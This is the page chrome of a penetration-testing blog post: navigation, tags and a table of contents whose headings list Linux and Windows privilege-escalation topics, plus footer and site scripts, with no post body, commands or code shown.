		<em class="post-meta-item-text"> Page View </em> <i class="leancloud-visitors-count"></i>
	</span>
	
	<div>
  	<center>

	<div class="pagination">

    
    
    <a href="/2020/12/24/Finding and performing SSTI/" type="button" class="btn btn-default"><i
                class="fa fa-arrow-circle-o-left"></i> Prev</a>
    

    <a href="/" type="button" class="btn btn-default"><i class="fa fa-home"></i>Home</a>
    
    <a href="/2020/12/20/Content Discovery/" type="button" class="btn btn-default ">Next<i
                class="fa fa-arrow-circle-o-right"></i></a>
    

    
</div>


    </center>
	</div>
	
	<!-- comment -->
	<!--
<section id="comment">
    <h2 class="title">Comments</h2>

    
</section>

-->
	
	</div> <!-- col-md-9/col-md-12 -->


	
	<div id="side_meta">
		<div class="col-md-3" id="post_meta"> 

	<!-- date -->
	
	<div class="meta-widget">
	<i class="fa fa-clock-o"></i>
	2020-12-21 
	</div>
	

	<!-- categories -->
    

	<!-- tags -->
	
	<div class="meta-widget">
	<a data-toggle="collapse" data-target="#tags"><i class="fa fa-tags"></i></a>		  
    <ul id="tags" class="tag_box list-unstyled collapse in">	  
	    
  <li><a href="/tags/TOOLING/">TOOLING<span>3</span></a></li> <li><a href="/tags/METHODOLOGY/">METHODOLOGY<span>5</span></a></li> <li><a href="/tags/OSCP/">OSCP<span>6</span></a></li> <li><a href="/tags/EXPLOIT/">EXPLOIT<span>3</span></a></li>
    </ul>
	</div>
		

	<!-- toc -->
	<div class="meta-widget">
	
	   <a data-toggle="collapse" data-target="#toc"><i class="fa fa-bars"></i></a>
	   <div id="toc" class="toc collapse in">
		   <span class="toc-title">Contents</span>
			<ol class="toc-article"><li class="toc-article-item toc-article-level-3"><a class="toc-article-link" href="#Linux"><span class="toc-article-text">Linux</span></a><ol class="toc-article-child"><li class="toc-article-item toc-article-level-4"><a class="toc-article-link" href="#Enumeration-Script"><span class="toc-article-text">Enumeration Script</span></a></li><li class="toc-article-item toc-article-level-4"><a class="toc-article-link" href="#Check-distribution-type-and-version"><span class="toc-article-text">Check distribution type and version</span></a></li><li class="toc-article-item toc-article-level-4"><a class="toc-article-link" href="#Check-kernel-version"><span class="toc-article-text">Check kernel version</span></a></li><li class="toc-article-item toc-article-level-4"><a class="toc-article-link" href="#Check-env"><span class="toc-article-text">Check env</span></a></li><li class="toc-article-item toc-article-level-4"><a class="toc-article-link" href="#Check-what-ports-are-listening-from-inside"><span class="toc-article-text">Check what ports are listening from inside</span></a></li><li class="toc-article-item toc-article-level-4"><a class="toc-article-link" href="#Check-services-running-owned-by-root"><span class="toc-article-text">Check services running owned by root</span></a></li><li class="toc-article-item toc-article-level-4"><a class="toc-article-link" href="#Check-information-about-applications-installed"><span class="toc-article-text">Check information about applications installed</span></a></li><li class="toc-article-item toc-article-level-4"><a class="toc-article-link" href="#Check-what-jobs-are-scheduled"><span class="toc-article-text">Check what jobs are scheduled</span></a></li><li class="toc-article-item toc-article-level-4"><a class="toc-article-link" href="#Try-to-listen-to-live-traffic"><span class="toc-article-text">Try to listen to live traffic</span></a></li><li class="toc-article-item toc-article-level-4"><a class="toc-article-link" href="#Self-exploration"><span class="toc-article-text">Self exploration</span></a></li><li class="toc-article-item toc-article-level-4"><a class="toc-article-link" href="#Find-Suid-Guid-misconfiguration-and-exploit"><span class="toc-article-text">Find Suid , Guid misconfiguration and exploit</span></a></li><li class="toc-article-item toc-article-level-4"><a class="toc-article-link" href="#Abuse-sudo-rights"><span class="toc-article-text">Abuse sudo rights</span></a></li><li class="toc-article-item toc-article-level-4"><a class="toc-article-link" href="#World-writable-scripts-onwed-by-root"><span class="toc-article-text">World writable scripts onwed by root</span></a></li></ol></li><li class="toc-article-item toc-article-level-3"><a class="toc-article-link" href="#Windows"><span class="toc-article-text">Windows</span></a><ol class="toc-article-child"><li class="toc-article-item toc-article-level-4"><a class="toc-article-link" href="#Self-exploration-1"><span class="toc-article-text">Self exploration</span></a></li><li class="toc-article-item toc-article-level-4"><a class="toc-article-link" href="#Look-for-passwords"><span class="toc-article-text">Look for passwords</span></a></li><li class="toc-article-item toc-article-level-4"><a class="toc-article-link" href="#Look-for-passwords-in-files"><span class="toc-article-text">Look for passwords in files</span></a></li><li class="toc-article-item toc-article-level-4"><a class="toc-article-link" href="#Look-for-passwords-in-registry"><span class="toc-article-text">Look for passwords in registry</span></a></li><li class="toc-article-item toc-article-level-4"><a class="toc-article-link" href="#Check-for-services-only-available-from-inside"><span class="toc-article-text">Check for services only available from inside</span></a></li><li class="toc-article-item toc-article-level-4"><a class="toc-article-link" href="#Kernel-exploits"><span class="toc-article-text">Kernel exploits</span></a></li><li class="toc-article-item toc-article-level-4"><a class="toc-article-link" href="#Find-scheduled-tasks"><span class="toc-article-text">Find scheduled tasks</span></a></li><li class="toc-article-item toc-article-level-4"><a class="toc-article-link" href="#Change-the-upnp-service-binary"><span class="toc-article-text">Change the upnp service binary</span></a></li><li class="toc-article-item toc-article-level-4"><a class="toc-article-link" href="#Weak-service-permissions"><span class="toc-article-text">Weak service permissions</span></a></li><li class="toc-article-item toc-article-level-4"><a class="toc-article-link" href="#MIgrate-the-meterpreter-shell"><span class="toc-article-text">MIgrate the meterpreter shell</span></a></li><li class="toc-article-item toc-article-level-4"><a class="toc-article-link" href="#Find-and-exploit-unquoted-service-paths"><span class="toc-article-text">Find and exploit unquoted service paths</span></a></li></ol></li></ol>
		</div>
	
	</div>
	
    <hr>
	
</div><!-- col-md-3 -->

		

	</div>
	
		

</div><!-- row -->

<!--
 -->



	</div>
  </div>
  <div class="container-narrow">
  <footer> <p>
  
  &copy; 2022 dmeg's Blog
  
        
</p>
 </footer>
</div> <!-- container-narrow -->
  


  
<a id="gotop" href="#">   
  <span>⬆︎TOP</span>
</a>

<script src="/js/jquery.imagesloaded.min.js"></script>
<script src="/js/gallery.js"></script>
<script src="/js/bootstrap.min.js"></script>
<script src="/js/main.js"></script>
<script src="/js/search.js"></script> 


<link rel="stylesheet" href="/fancybox/jquery.fancybox.css" media="screen" type="text/css">
<script src="/fancybox/jquery.fancybox.pack.js"></script>
<script type="text/javascript">
(function($){
  $('.fancybox').fancybox();
})(jQuery);
</script>



   <script type="text/javascript">      
     var search_path = "search.xml";
	 if (search_path.length == 0) {
	 	search_path = "search.xml";
	 }
	 var path = "/" + search_path;
     searchFunc(path, 'local-search-input', 'local-search-result');
   </script>

</body>
   </html>
